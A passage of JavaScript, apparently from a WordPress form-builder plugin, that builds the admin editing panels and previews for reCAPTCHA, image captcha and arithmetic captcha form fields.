		var el_attr_td_name = document.createElement('td');
			el_attr_td_name.style.cssText = 'width:100px';
		var el_attr_td_value = document.createElement('td');
			el_attr_td_value.style.cssText = 'width:100px';
		
		var el_attr_td_X = document.createElement('td');
		var el_attr_name = document.createElement('input');
	
			el_attr_name.setAttribute("type", "text");
	
			el_attr_name.setAttribute("class", "fm-field-choice");
			el_attr_name.setAttribute("value", w_attr_name[j-1]);
			el_attr_name.setAttribute("id", "attr_name"+j);
			el_attr_name.setAttribute("onChange", "change_attribute_name("+i+", this, 'type_recaptcha')");
			
		var el_attr_value = document.createElement('input');
			el_attr_value.setAttribute("type", "text");
			el_attr_value.setAttribute("class", "fm-field-choice");
			el_attr_value.setAttribute("value", w_attr_value[j-1]);
			el_attr_value.setAttribute("id", "attr_value"+j);
			el_attr_value.setAttribute("onChange", "change_attribute_value("+i+", "+j+", 'type_recaptcha')");
	
		var el_attr_remove = document.createElement('img');
			el_attr_remove.setAttribute("id", "el_choices"+j+"_remove");
			el_attr_remove.setAttribute("src", plugin_url + '/images/delete.png?ver=1.8.0');
			el_attr_remove.style.cssText = 'cursor:pointer; vertical-align:middle; margin:2px';
			
			el_attr_remove.setAttribute("onClick", "remove_attr("+j+", "+i+", 'type_recaptcha')");
		el_attr_table.appendChild(el_attr_tr);
		el_attr_tr.appendChild(el_attr_td_name);
		el_attr_tr.appendChild(el_attr_td_value);
		el_attr_tr.appendChild(el_attr_td_X);
		el_attr_td_name.appendChild(el_attr_name);
		el_attr_td_value.appendChild(el_attr_value);
		el_attr_td_X.appendChild(el_attr_remove);
		
	}
		
	var t  = document.getElementById('edit_table');
	
	var br = document.createElement('br');
	var br1 = document.createElement('br');
	var br2 = document.createElement('br');
	var br3 = document.createElement('br');
	var br4 = document.createElement('br');
	var br5 = document.createElement('br');
	var br6 = document.createElement('br');
	
	edit_main_td1.appendChild(el_label_label);
	edit_main_td1_1.appendChild(el_label_textarea);
	
	edit_main_td9.appendChild(el_label_size_label);
	edit_main_td9_1.appendChild(el_label_size);

	edit_main_td2.appendChild(el_label_position_label);
	edit_main_td2_1.appendChild(el_label_position1);
	edit_main_td2_1.appendChild(el_label_left);
	edit_main_td2_1.appendChild(br);
	edit_main_td2_1.appendChild(el_label_position2);
	edit_main_td2_1.appendChild(el_label_top);
	
	edit_main_td4.appendChild(el_style_label);
	edit_main_td4_1.appendChild(el_style_textarea);
	
	edit_main_td6.appendChild(el_public_label);
	edit_main_td6_1.appendChild(el_public_link);

	edit_main_td5.appendChild(el_attr_label);
	edit_main_td5.appendChild(el_attr_add);
	edit_main_td5.appendChild(br3);
	edit_main_td5.appendChild(el_attr_table);
	edit_main_td5.setAttribute("colspan", "2");

	edit_main_tr1.appendChild(edit_main_td1);
	edit_main_tr1.appendChild(edit_main_td1_1);
	edit_main_tr9.appendChild(edit_main_td9);
	edit_main_tr9.appendChild(edit_main_td9_1);
	
	edit_main_tr2.appendChild(edit_main_td2);
	edit_main_tr2.appendChild(edit_main_td2_1);
	edit_main_tr3.appendChild(edit_main_td3);
	edit_main_tr3.appendChild(edit_main_td3_1);
	edit_main_tr4.appendChild(edit_main_td4);
	edit_main_tr4.appendChild(edit_main_td4_1);
	edit_main_tr5.appendChild(edit_main_td5);
	edit_main_tr5.appendChild(edit_main_td5_1);
	edit_main_tr6.appendChild(edit_main_td6);
	edit_main_tr6.appendChild(edit_main_td6_1);

	edit_main_table.appendChild(edit_main_tr1);
	edit_main_table.appendChild(edit_main_tr9);
	edit_main_table.appendChild(edit_main_tr2);
	edit_main_table.appendChild(edit_main_tr6);
	edit_main_table.appendChild(edit_main_tr4);
	edit_main_table.appendChild(edit_main_tr5);
	edit_div.appendChild(edit_main_table);
	
	t.appendChild(edit_div);
	add_id_and_name(i, 'type_text');

	element='img';	type='captcha'; 
	var adding_type = document.createElement("input");
		adding_type.setAttribute("type", "hidden");
		adding_type.setAttribute("value", "type_recaptcha");
		adding_type.setAttribute("name", i+"_typeform_id_temp");
		adding_type.setAttribute("id", i+"_typeform_id_temp");

	var adding = document.createElement('div');
		adding.setAttribute("id", "wd_recaptchaform_id_temp");
		adding.setAttribute("public_key", w_public);
		adding.setAttribute("private_key", w_private);
		adding.setAttribute("theme", w_theme);
		
	var adding_text = document.createElement('span');
		adding_text.style.color="red";
		adding_text.style.fontStyle="italic";
		adding_text.innerHTML="Recaptcha doesn't display in back end";
		
	adding.appendChild(adding_text);
	
	var div = document.createElement('div');
		div.setAttribute("id", "main_div");
				
	var div_field = document.createElement('div');
		div_field.setAttribute("id", i+"_elemet_tableform_id_temp");
					
	var div_label = document.createElement('div');
		div_label.setAttribute("align", 'left');
		div_label.style.display="table-cell";
		div_label.style.width=w_field_label_size+"px";
		div_label.setAttribute("id", i+"_label_sectionform_id_temp");
		
	var div_element = document.createElement('div');
		div_element.setAttribute("align", 'left');
		div_element.style.display="table-cell";
		div_element.setAttribute("id", i+"_element_sectionform_id_temp");
		
	

	var br1 = document.createElement('br');
	var br2 = document.createElement('br');
	var br3 = document.createElement('br');
	var br4 = document.createElement('br');
  

	var label = document.createElement('span');
		label.setAttribute("id", i+"_element_labelform_id_temp");
		label.innerHTML = w_field_label;
		label.setAttribute("class", "label");
		label.style.verticalAlign="top";
	
	var main_td  = document.getElementById('show_table');
  
	div_label.appendChild(label);
	div_element.appendChild(adding_type);
	div_element.appendChild(adding);
	div_field.appendChild(div_label);
	div_field.appendChild(div_element);

	div.appendChild(div_field);
	div.appendChild(br3);
	main_td.appendChild(div);
	if(w_field_label_pos=="top")
		label_top(i);
	change_class(w_class, i);
	refresh_attr(i, 'type_recaptcha');
}

function type_captcha(i,w_field_label, w_field_label_size, w_field_label_pos, w_digit, w_class, w_attr_name, w_attr_value){
   
	document.getElementById("element_type").value="type_captcha";
	delete_last_child();
	var edit_div  = document.createElement('div');
		edit_div.setAttribute("id", "edit_div");
		
	var edit_main_table  = document.createElement('table');
		edit_main_table.setAttribute("id", "edit_main_table");
		edit_main_table.setAttribute("cellpadding", "3");
		edit_main_table.setAttribute("cellspacing", "0");
		
	var edit_main_tr1  = document.createElement('tr');
	var edit_main_tr2  = document.createElement('tr');
	var edit_main_tr3  = document.createElement('tr');
	var edit_main_tr4  = document.createElement('tr');
	var edit_main_tr5  = document.createElement('tr');
	var edit_main_tr6  = document.createElement('tr');
	var edit_main_tr7  = document.createElement('tr');
      			
	var edit_main_td1 = document.createElement('td');
	var edit_main_td1_1 = document.createElement('td');
	var edit_main_td2 = document.createElement('td');
	var edit_main_td2_1 = document.createElement('td');
	var edit_main_td3 = document.createElement('td');
	var edit_main_td3_1 = document.createElement('td');
	var edit_main_td4 = document.createElement('td');
	var edit_main_td4_1 = document.createElement('td');
	var edit_main_td5 = document.createElement('td');
	var edit_main_td5_1 = document.createElement('td');
	var edit_main_td6 = document.createElement('td');
	var edit_main_td6_1 = document.createElement('td');
	var edit_main_td7 = document.createElement('td');
	var edit_main_td7_1 = document.createElement('td');	
		  
	var el_label_label = document.createElement('label');
		el_label_label.setAttribute("class", "fm-field-label");
	    el_label_label.setAttribute("for", "edit_for_label");
		el_label_label.innerHTML = "Field label";
	
	var el_label_textarea = document.createElement('textarea');
        el_label_textarea.setAttribute("id", "edit_for_label");
        el_label_textarea.setAttribute("rows", "4");
        
        el_label_textarea.setAttribute("onKeyUp", "change_label('"+i+"_element_labelform_id_temp', this.value)");
		el_label_textarea.innerHTML = w_field_label;
	
	var el_label_size_label = document.createElement('label');
		el_label_size_label.setAttribute("class", "fm-field-label");
	    el_label_size_label.setAttribute("for", "edit_for_label_size");
		el_label_size_label.innerHTML = "Field label size(px) ";
		
	var el_label_size = document.createElement('input');
	    el_label_size.setAttribute("id", "edit_for_label_size");
	    el_label_size.setAttribute("type", "text");
	    el_label_size.setAttribute("value", w_field_label_size);
		
		el_label_size.setAttribute("onKeyPress", "return check_isnum(event)");
        el_label_size.setAttribute("onKeyUp", "change_w_style('"+i+"_label_sectionform_id_temp', this.value)");
	
	var el_label_position_label = document.createElement('label');
		el_label_position_label.setAttribute("class", "fm-field-label");
		el_label_position_label.innerHTML = "Field label position";

	var el_label_position1 = document.createElement('input');
		el_label_position1.setAttribute("id", "edit_for_label_position_top");
		el_label_position1.setAttribute("type", "radio");
		el_label_position1.setAttribute("name", "edit_for_label_position");
		el_label_position1.setAttribute("onchange", "label_left("+i+")");

	var el_label_left = document.createElement('label');
		el_label_left.setAttribute("for", "edit_for_label_position_top");
		el_label_left.innerHTML = "Left";	

	var el_label_position2 = document.createElement('input');
		el_label_position2.setAttribute("id", "edit_for_label_position_left");
		el_label_position2.setAttribute("type", "radio");
		el_label_position2.setAttribute("name", "edit_for_label_position");
		el_label_position2.setAttribute("onchange", "label_top("+i+")");

	var el_label_top = document.createElement('label');
		el_label_top.setAttribute("for", "edit_for_label_position_left");
		el_label_top.innerHTML = "Top";
		
	if(w_field_label_pos=="top")
		el_label_position2.setAttribute("checked", "checked");
	else
		el_label_position1.setAttribute("checked", "checked");

	var el_size_label = document.createElement('label');
		el_size_label.setAttribute("class", "fm-field-label");
	    el_size_label.setAttribute("for", "captcha_digit");
		el_size_label.innerHTML = "Captcha size";
	
	var el_captcha_digit = document.createElement('input');
        el_captcha_digit.setAttribute("id", "captcha_digit");
        el_captcha_digit.setAttribute("type", "text");
        el_captcha_digit.setAttribute("value", w_digit);
		el_captcha_digit.setAttribute("name", "captcha_digit");
 		el_captcha_digit.setAttribute("onKeyPress", "return check_isnum_3_10(event)");
        el_captcha_digit.setAttribute("onKeyUp", "change_captcha_digit(this.value, '"+i+"')");
	    el_captcha_digit.style.cssText ="margin-right:18px";

	Digits = document.createTextNode("Digits (3 - 9)");
	
	var el_style_label = document.createElement('label');
		el_style_label.setAttribute("class", "fm-field-label");
	    el_style_label.setAttribute("for", "el_style_textarea");
		el_style_label.innerHTML = "Class name";
	
	var el_style_textarea = document.createElement('input');
        el_style_textarea.setAttribute("id", "el_style_textarea");
		el_style_textarea.setAttribute("type", "text");
		el_style_textarea.setAttribute("value", w_class);
        el_style_textarea.setAttribute("onChange", "change_class(this.value,'"+i+"')");

	var el_attr_label = document.createElement('label');
	    el_attr_label.setAttribute("class", "fm-field-label");
		el_attr_label.innerHTML = "Additional Attributes";
		
	var el_attr_add = document.createElement('img');
        el_attr_add.setAttribute("src", plugin_url + '/images/add.png?ver=1.8.0');
        el_attr_add.style.cssText = 'cursor:pointer; margin-left:68px';
        el_attr_add.setAttribute("title", 'add');
        el_attr_add.setAttribute("onClick", "add_attr("+i+", 'type_captcha')");
		
	var el_attr_table = document.createElement('table');
        el_attr_table.setAttribute("id", 'attributes');
        el_attr_table.setAttribute("border", '0');
        el_attr_table.style.cssText = 'margin-left:0px';
		
	var el_attr_tr_label = document.createElement('tr');
        el_attr_tr_label.setAttribute("idi", '0');
		
	var el_attr_td_name_label = document.createElement('th');
        el_attr_td_name_label.style.cssText = 'width:100px';
		
	var el_attr_td_value_label = document.createElement('th');
        el_attr_td_value_label.style.cssText = 'width:100px';
		
	var el_attr_td_X_label = document.createElement('th');
        el_attr_td_X_label.style.cssText = 'width:10px';
		
	var el_attr_name_label = document.createElement('label');
	    el_attr_name_label.style.cssText ="color:#000; font-weight:bold; font-size: 11px";
		el_attr_name_label.innerHTML = "Name";
			
	var el_attr_value_label = document.createElement('label');
	    el_attr_value_label.style.cssText ="color:#000; font-weight:bold; font-size: 11px";
		el_attr_value_label.innerHTML = "Value";
			
	el_attr_table.appendChild(el_attr_tr_label);
	el_attr_tr_label.appendChild(el_attr_td_name_label);
	el_attr_tr_label.appendChild(el_attr_td_value_label);
	el_attr_tr_label.appendChild(el_attr_td_X_label);
	el_attr_td_name_label.appendChild(el_attr_name_label);
	el_attr_td_value_label.appendChild(el_attr_value_label);
	
	n=w_attr_name.length;
	for(j=1; j<=n; j++)
	{	
		var el_attr_tr = document.createElement('tr');
			el_attr_tr.setAttribute("id", "attr_row_"+j);
			el_attr_tr.setAttribute("idi", j);
		var el_attr_td_name = document.createElement('td');
			el_attr_td_name.style.cssText = 'width:100px';
		var el_attr_td_value = document.createElement('td');
			el_attr_td_value.style.cssText = 'width:100px';
		
		var el_attr_td_X = document.createElement('td');
		var el_attr_name = document.createElement('input');
	
			el_attr_name.setAttribute("type", "text");
	
			el_attr_name.setAttribute("class", "fm-field-choice");
			el_attr_name.setAttribute("value", w_attr_name[j-1]);
			el_attr_name.setAttribute("id", "attr_name"+j);
			el_attr_name.setAttribute("onChange", "change_attribute_name("+i+", this, 'type_captcha')");
			
		var el_attr_value = document.createElement('input');
			el_attr_value.setAttribute("type", "text");
			el_attr_value.setAttribute("class", "fm-field-choice");
			el_attr_value.setAttribute("value", w_attr_value[j-1]);
			el_attr_value.setAttribute("id", "attr_value"+j);
			el_attr_value.setAttribute("onChange", "change_attribute_value("+i+", "+j+", 'type_captcha')");
	
		var el_attr_remove = document.createElement('img');
			el_attr_remove.setAttribute("id", "el_choices"+j+"_remove");
			el_attr_remove.setAttribute("src", plugin_url + '/images/delete.png?ver=1.8.0');
			el_attr_remove.style.cssText = 'cursor:pointer; vertical-align:middle; margin:2px';
			
		el_attr_remove.setAttribute("onClick", "remove_attr("+j+", "+i+", 'type_captcha')");
		el_attr_table.appendChild(el_attr_tr);
		el_attr_tr.appendChild(el_attr_td_name);
		el_attr_tr.appendChild(el_attr_td_value);
		el_attr_tr.appendChild(el_attr_td_X);
		el_attr_td_name.appendChild(el_attr_name);
		el_attr_td_value.appendChild(el_attr_value);
		el_attr_td_X.appendChild(el_attr_remove);
		
	}
		
	var t  = document.getElementById('edit_table');
	
	var br = document.createElement('br');
	var br1 = document.createElement('br');
	var br2 = document.createElement('br');
	var br3 = document.createElement('br');
	var br4 = document.createElement('br');
	var br5 = document.createElement('br');
	var br6 = document.createElement('br');
	
	edit_main_td1.appendChild(el_label_label);
	edit_main_td1_1.appendChild(el_label_textarea);
	
	edit_main_td7.appendChild(el_label_size_label);
	edit_main_td7_1.appendChild(el_label_size);

	edit_main_td2.appendChild(el_label_position_label);
	edit_main_td2_1.appendChild(el_label_position1);
	edit_main_td2_1.appendChild(el_label_left);
	edit_main_td2_1.appendChild(br);
	edit_main_td2_1.appendChild(el_label_position2);
	edit_main_td2_1.appendChild(el_label_top);
	
	edit_main_td3.appendChild(el_size_label);
	edit_main_td3_1.appendChild(el_captcha_digit);
	edit_main_td3_1.appendChild(Digits);
	
	edit_main_td4.appendChild(el_style_label);
	edit_main_td4_1.appendChild(el_style_textarea);
	
	
	
	edit_main_td5.appendChild(el_attr_label);
	edit_main_td5.appendChild(el_attr_add);
	edit_main_td5.appendChild(br3);
	edit_main_td5.appendChild(el_attr_table);
	edit_main_td5.setAttribute("colspan", "2");

	edit_main_tr1.appendChild(edit_main_td1);
	edit_main_tr1.appendChild(edit_main_td1_1);
	edit_main_tr7.appendChild(edit_main_td7);
	edit_main_tr7.appendChild(edit_main_td7_1);
	edit_main_tr2.appendChild(edit_main_td2);
	edit_main_tr2.appendChild(edit_main_td2_1);
	edit_main_tr3.appendChild(edit_main_td3);
	edit_main_tr3.appendChild(edit_main_td3_1);
	edit_main_tr4.appendChild(edit_main_td4);
	edit_main_tr4.appendChild(edit_main_td4_1);
	edit_main_tr5.appendChild(edit_main_td5);
	edit_main_tr5.appendChild(edit_main_td5_1);
	edit_main_table.appendChild(edit_main_tr1);
	edit_main_table.appendChild(edit_main_tr7);
	edit_main_table.appendChild(edit_main_tr2);
	edit_main_table.appendChild(edit_main_tr3);
	edit_main_table.appendChild(edit_main_tr4);
	edit_main_table.appendChild(edit_main_tr5);
	edit_div.appendChild(edit_main_table);
	
	t.appendChild(edit_div);
	add_id_and_name(i, 'type_captcha');

	element='img';	type='captcha'; 
	var adding_type = document.createElement("input");
		adding_type.setAttribute("type", "hidden");
		adding_type.setAttribute("value", "type_captcha");
		adding_type.setAttribute("name", i+"_typeform_id_temp");
		adding_type.setAttribute("id", i+"_typeform_id_temp");

	var adding = document.createElement(element);
		adding.setAttribute("type", type);
		adding.setAttribute("digit", w_digit);
		adding.setAttribute("src", url_for_ajax + "?action=formcontactwdcaptcha&digit="+w_digit+"&i=form_id_temp");
		adding.setAttribute("id", "_wd_captchaform_id_temp");
		adding.setAttribute("class", "captcha_img");
		adding.setAttribute("onClick", "captcha_refresh('_wd_captcha','form_id_temp')");
			
   	var refresh_captcha = document.createElement("div");
		refresh_captcha.setAttribute("class", "captcha_refresh");
		refresh_captcha.setAttribute("id", "_element_refreshform_id_temp");
		refresh_captcha.setAttribute("onClick", "captcha_refresh('_wd_captcha','form_id_temp')");

	var input_captcha = document.createElement("input");
		input_captcha.setAttribute("type", "text");
		input_captcha.style.cssText = "width:"+(w_digit*10+15)+"px;";
		input_captcha.setAttribute("class", "captcha_input");
		input_captcha.setAttribute("id", "_wd_captcha_inputform_id_temp");
		input_captcha.setAttribute("name", "captcha_input");

	var div = document.createElement('div');
		div.setAttribute("id", "main_div");
				
	var div_field = document.createElement('div');
		div_field.setAttribute("id", i+"_elemet_tableform_id_temp");
					
	var div_label = document.createElement('div');
		div_label.setAttribute("align", 'left');
		div_label.style.display="table-cell";
		div_label.style.width=w_field_label_size+"px";
		div_label.setAttribute("id", i+"_label_sectionform_id_temp");
		
	var div_element = document.createElement('div');
		div_element.setAttribute("align", 'left');
		div_element.style.display="table-cell";
		div_element.setAttribute("id", i+"_element_sectionform_id_temp");
			
	var captcha_table = document.createElement('div');
		captcha_table.style.display="table";
	
	var captcha_tr1 = document.createElement('div');
		captcha_tr1.style.display="table-row";
	var captcha_tr2 = document.createElement('div');
		captcha_tr2.style.display="table-row";

	var captcha_td1 = document.createElement('div');
		captcha_td1.setAttribute("valign", 'middle');
		captcha_td1.style.display="table-cell";

	var captcha_td2 = document.createElement('div');
		captcha_td2.setAttribute("valign", 'middle');
		captcha_td2.style.display="table-cell";
	var captcha_td3 = document.createElement('div');
		captcha_td3.style.display="table-cell";
	
	captcha_table.appendChild(captcha_tr1);
	captcha_table.appendChild(captcha_tr2);
	captcha_tr1.appendChild(captcha_td1);
	captcha_tr1.appendChild(captcha_td2);
	captcha_tr2.appendChild(captcha_td3);
	
	captcha_td1.appendChild(adding);
	captcha_td2.appendChild(refresh_captcha);
	captcha_td3.appendChild(input_captcha);
	
	var br1 = document.createElement('br');
	var br2 = document.createElement('br');
	var br3 = document.createElement('br');
	var br4 = document.createElement('br');
     
	var label = document.createElement('span');
		label.setAttribute("id", i+"_element_labelform_id_temp");
		label.innerHTML = w_field_label;
		label.setAttribute("class", "label");
		label.style.verticalAlign="top";
	
	var main_td  = document.getElementById('show_table');
      
	div_label.appendChild(label);
	div_element.appendChild(adding_type);
	div_element.appendChild(captcha_table);
	div_field.appendChild(div_label);
	div_field.appendChild(div_element);

  
	div.appendChild(div_field);
	div.appendChild(br3);
	main_td.appendChild(div);
	if(w_field_label_pos=="top")
		label_top(i);
	change_class(w_class, i);
	refresh_attr(i, 'type_captcha');
}

function type_arithmetic_captcha(i,w_field_label, w_field_label_size, w_field_label_pos, w_count, w_operations, w_class, w_input_size, w_attr_name, w_attr_value){
	
    document.getElementById("element_type").value="type_arithmetic_captcha";
	delete_last_child();

	var edit_div  = document.createElement('div');
		edit_div.setAttribute("id", "edit_div");
		
	var edit_main_table  = document.createElement('table');
		edit_main_table.setAttribute("id", "edit_main_table");
		edit_main_table.setAttribute("cellpadding", "3");
		edit_main_table.setAttribute("cellspacing", "0");
		
	var edit_main_tr1  = document.createElement('tr');		
	var edit_main_tr2  = document.createElement('tr');
	var edit_main_tr3  = document.createElement('tr');
	var edit_main_tr4  = document.createElement('tr');
	var edit_main_tr5  = document.createElement('tr');
	var edit_main_tr6  = document.createElement('tr');
	var edit_main_tr7  = document.createElement('tr');
	var edit_main_tr8  = document.createElement('tr');

	var edit_main_td1 = document.createElement('td');
	var edit_main_td1_1 = document.createElement('td');
	var edit_main_td2 = document.createElement('td');
	var edit_main_td2_1 = document.createElement('td');
	var edit_main_td3 = document.createElement('td');
	var edit_main_td3_1 = document.createElement('td');
	var edit_main_td4 = document.createElement('td');
	var edit_main_td4_1 = document.createElement('td');
	var edit_main_td5 = document.createElement('td');
	var edit_main_td5_1 = document.createElement('td');
	var edit_main_td6 = document.createElement('td');
	var edit_main_td6_1 = document.createElement('td');
	var edit_main_td7 = document.createElement('td');
	var edit_main_td7_1 = document.createElement('td');
	var edit_main_td8 = document.createElement('td');
	var edit_main_td8_1 = document.createElement('td');
		  
	var el_label_label = document.createElement('label');
		el_label_label.setAttribute("class", "fm-field-label");
	    el_label_label.setAttribute("for", "edit_for_label");
		el_label_label.innerHTML = "Field label";
	
	var el_label_textarea = document.createElement('textarea');
        el_label_textarea.setAttribute("id", "edit_for_label");
        el_label_textarea.setAttribute("rows", "4");
        
        el_label_textarea.setAttribute("onKeyUp", "change_label('"+i+"_element_labelform_id_temp', this.value)");
		el_label_textarea.innerHTML = w_field_label;
	
	var el_label_size_label = document.createElement('label');
		el_label_size_label.setAttribute("class", "fm-field-label");
	    el_label_size_label.setAttribute("for", "edit_for_label_size");
		el_label_size_label.innerHTML = "Field label size(px) ";
		
	var el_label_size = document.createElement('input');
	    el_label_size.setAttribute("id", "edit_for_label_size");
	    el_label_size.setAttribute("type", "text");
	    el_label_size.setAttribute("value", w_field_label_size);
		el_label_size.setAttribute("onKeyPress", "return check_isnum(event)");
        el_label_size.setAttribute("onKeyUp", "change_w_style('"+i+"_label_sectionform_id_temp', this.value)");
	
	var el_label_position_label = document.createElement('label');
		el_label_position_label.setAttribute("class", "fm-field-label");
		el_label_position_label.innerHTML = "Field label position";

	var el_label_position1 = document.createElement('input');
		el_label_position1.setAttribute("id", "edit_for_label_position_top");
		el_label_position1.setAttribute("type", "radio");
		el_label_position1.setAttribute("name", "edit_for_label_position");
		el_label_position1.setAttribute("onchange", "label_left("+i+")");

	var el_label_left = document.createElement('label');
		el_label_left.setAttribute("for", "edit_for_label_position_top");
		el_label_left.innerHTML = "Left";	

	var el_label_position2 = document.createElement('input');
		el_label_position2.setAttribute("id", "edit_for_label_position_left");
		el_label_position2.setAttribute("type", "radio");
		el_label_position2.setAttribute("name", "edit_for_label_position");
		el_label_position2.setAttribute("onchange", "label_top("+i+")");

	var el_label_top = document.createElement('label');
		el_label_top.setAttribute("for", "edit_for_label_position_left");
		el_label_top.innerHTML = "Top";
		
	if(w_field_label_pos=="top")
		el_label_position2.setAttribute("checked", "checked");
	else
		el_label_position1.setAttribute("checked", "checked");

	var el_operations_label = document.createElement('label');
		el_operations_label.setAttribute("class", "fm-field-label");
	    el_operations_label.setAttribute("for", "el_operations");
		el_operations_label.innerHTML = "Arithmetic operations";
	
	var el_operations = document.createElement('input');
        el_operations.setAttribute("id", "el_operations");
		el_operations.setAttribute("type", "text");
		el_operations.setAttribute("value", w_operations);
		el_operations.setAttribute("onKeyPress", "return check_is_operation_valid(event)");
        el_operations.setAttribute("onChange", "change_arithmetic_captcha(this.value, 'operations')");
	
	var el_size_label = document.createElement('label');
		el_size_label.setAttribute("class", "fm-field-label");
	    el_size_label.setAttribute("for", "el_oper_count");
		el_size_label.innerHTML = "Operations count";
	
	var el_oper_count = document.createElement('input');
        el_oper_count.setAttribute("id", "el_oper_count");
        el_oper_count.setAttribute("type", "text");
        el_oper_count.setAttribute("value", w_count);
		el_oper_count.setAttribute("name", "el_oper_count");
 		el_oper_count.setAttribute("onKeyPress", "return check_isnum_less_then_5(event)");
        el_oper_count.setAttribute("onKeyUp", "change_arithmetic_captcha(this.value, 'oper_count')");

	Digits = document.createTextNode("Digits (1 - 5)");
	
	var el_size_captcha_label = document.createElement('label');
		el_size_captcha_label.setAttribute("class", "fm-field-label");
	    el_size_captcha_label.setAttribute("for", "el_captcha_input_size");
		el_size_captcha_label.innerHTML = "Captcha input size";
	
	var el_size_captcha_input = document.createElement('input');
        el_size_captcha_input.setAttribute("id", "el_captcha_input_size");
        el_size_captcha_input.setAttribute("type", "text");
        el_size_captcha_input.setAttribute("value", w_input_size);
		el_size_captcha_input.setAttribute("name", "el_captcha_input_size");
 		el_size_captcha_input.setAttribute("onKeyPress", "return check_isnum(event)");
		el_size_captcha_input.setAttribute("onKeyUp", "change_w_style('_wd_arithmetic_captcha_inputform_id_temp', this.value)");
	
	var el_style_label = document.createElement('label');
		el_style_label.setAttribute("class", "fm-field-label");
	    el_style_label.setAttribute("for", "el_style_textarea");
		el_style_label.innerHTML = "Class name";
	
	var el_style_textarea = document.createElement('input');
        el_style_textarea.setAttribute("id", "el_style_textarea");
		el_style_textarea.setAttribute("type", "text");
		el_style_textarea.setAttribute("value", w_class);
        
        el_style_textarea.setAttribute("onChange", "change_class(this.value,'"+i+"')");

	var el_attr_label = document.createElement('label');
		el_attr_label.setAttribute("class", "fm-field-label");
		el_attr_label.innerHTML = "Additional Attributes";
		
	var el_attr_add = document.createElement('img');
        el_attr_add.setAttribute("src", plugin_url + '/images/add.png?ver=1.8.0');
        el_attr_add.style.cssText = 'cursor:pointer; margin-left:68px';
        el_attr_add.setAttribute("title", 'add');
        el_attr_add.setAttribute("onClick", "add_attr("+i+", 'type_arithmetic_captcha')");
		
	var el_attr_table = document.createElement('table');
        el_attr_table.setAttribute("id", 'attributes');
        el_attr_table.setAttribute("border", '0');
        el_attr_table.style.cssText = 'margin-left:0px';
		
	var el_attr_tr_label = document.createElement('tr');
        el_attr_tr_label.setAttribute("idi", '0');
		
	var el_attr_td_name_label = document.createElement('th');
        el_attr_td_name_label.style.cssText = 'width:100px';
		
	var el_attr_td_value_label = document.createElement('th');
        el_attr_td_value_label.style.cssText = 'width:100px';
		
	var el_attr_td_X_label = document.createElement('th');
        el_attr_td_X_label.style.cssText = 'width:10px';
		
	var el_attr_name_label = document.createElement('label');
	    el_attr_name_label.style.cssText ="color:#000; font-weight:bold; font-size: 11px";
		el_attr_name_label.innerHTML = "Name";
			
	var el_attr_value_label = document.createElement('label');
	    el_attr_value_label.style.cssText ="color:#000; font-weight:bold; font-size: 11px";
		el_attr_value_label.innerHTML = "Value";
			
	el_attr_table.appendChild(el_attr_tr_label);
	el_attr_tr_label.appendChild(el_attr_td_name_label);
	el_attr_tr_label.appendChild(el_attr_td_value_label);
	el_attr_tr_label.appendChild(el_attr_td_X_label);
	el_attr_td_name_label.appendChild(el_attr_name_label);
	el_attr_td_value_label.appendChild(el_attr_value_label);
	
	n=w_attr_name.length;
	for(j=1; j<=n; j++)
	{	
		var el_attr_tr = document.createElement('tr');
			el_attr_tr.setAttribute("id", "attr_row_"+j);
			el_attr_tr.setAttribute("idi", j);
		var el_attr_td_name = document.createElement('td');
			el_attr_td_name.style.cssText = 'width:100px';
		var el_attr_td_value = document.createElement('td');
			el_attr_td_value.style.cssText = 'width:100px';
		
		var el_attr_td_X = document.createElement('td');
		var el_attr_name = document.createElement('input');
			el_attr_name.setAttribute("type", "text");
			el_attr_name.setAttribute("class", "fm-field-choice");
			el_attr_name.setAttribute("value", w_attr_name[j-1]);
			el_attr_name.setAttribute("id", "attr_name"+j);
			el_attr_name.setAttribute("onChange", "change_attribute_name("+i+", this, 'type_arithmetic_captcha')");
			
		var el_attr_value = document.createElement('input');
			el_attr_value.setAttribute("type", "text");
			el_attr_value.setAttribute("class", "fm-field-choice");
			el_attr_value.setAttribute("value", w_attr_value[j-1]);
			el_attr_value.setAttribute("id", "attr_value"+j);
			el_attr_value.setAttribute("onChange", "change_attribute_value("+i+", "+j+", 'type_arithmetic_captcha')");
	
		var el_attr_remove = document.createElement('img');
			el_attr_remove.setAttribute("id", "el_choices"+j+"_remove");
			el_attr_remove.setAttribute("src", plugin_url + '/images/delete.png?ver=1.8.0');
			el_attr_remove.style.cssText = 'cursor:pointer; vertical-align:middle; margin:2px';
			el_attr_remove.setAttribute("onClick", "remove_attr("+j+", "+i+", 'type_arithmetic_captcha')");
		el_attr_table.appendChild(el_attr_tr);
		el_attr_tr.appendChild(el_attr_td_name);
		el_attr_tr.appendChild(el_attr_td_value);
		el_attr_tr.appendChild(el_attr_td_X);
		el_attr_td_name.appendChild(el_attr_name);
		el_attr_td_value.appendChild(el_attr_value);
		el_attr_td_X.appendChild(el_attr_remove);
	}
		
	var t  = document.getElementById('edit_table');
	var br = document.createElement('br');
	var br1 = document.createElement('br');
	var br2 = document.createElement('br');
	var br3 = document.createElement('br');
	var br4 = document.createElement('br');
	var br5 = document.createElement('br');
	var br6 = document.createElement('br');
	
	edit_main_td1.appendChild(el_label_label);
	edit_main_td1_1.appendChild(el_label_textarea);
	
	edit_main_td7.appendChild(el_label_size_label);
	edit_main_td7_1.appendChild(el_label_size);

	edit_main_td2.appendChild(el_label_position_label);
	edit_main_td2_1.appendChild(el_label_position1);
	edit_main_td2_1.appendChild(el_label_left);
	edit_main_td2_1.appendChild(br);
	edit_main_td2_1.appendChild(el_label_position2);
	edit_main_td2_1.appendChild(el_label_top);
	
	edit_main_td3.appendChild(el_size_label);
	edit_main_td3_1.appendChild(el_oper_count);
	edit_main_td3_1.appendChild(Digits);
	
	edit_main_td8.appendChild(el_size_captcha_label);
	edit_main_td8_1.appendChild(el_size_captcha_input);
	
	edit_main_td6.appendChild(el_operations_label);
	edit_main_td6_1.appendChild(el_operations);
	
	edit_main_td4.appendChild(el_style_label);
	edit_main_td4_1.appendChild(el_style_textarea);
	
	
	
	edit_main_td5.appendChild(el_attr_label);
	edit_main_td5.appendChild(el_attr_add);
	edit_main_td5.appendChild(br3);
	edit_main_td5.appendChild(el_attr_table);
	edit_main_td5.setAttribute("colspan", "2");
	
	edit_main_tr1.appendChild(edit_main_td1);
	edit_main_tr1.appendChild(edit_main_td1_1);
	edit_main_tr7.appendChild(edit_main_td7);
	edit_main_tr7.appendChild(edit_main_td7_1);
	edit_main_tr2.appendChild(edit_main_td2);
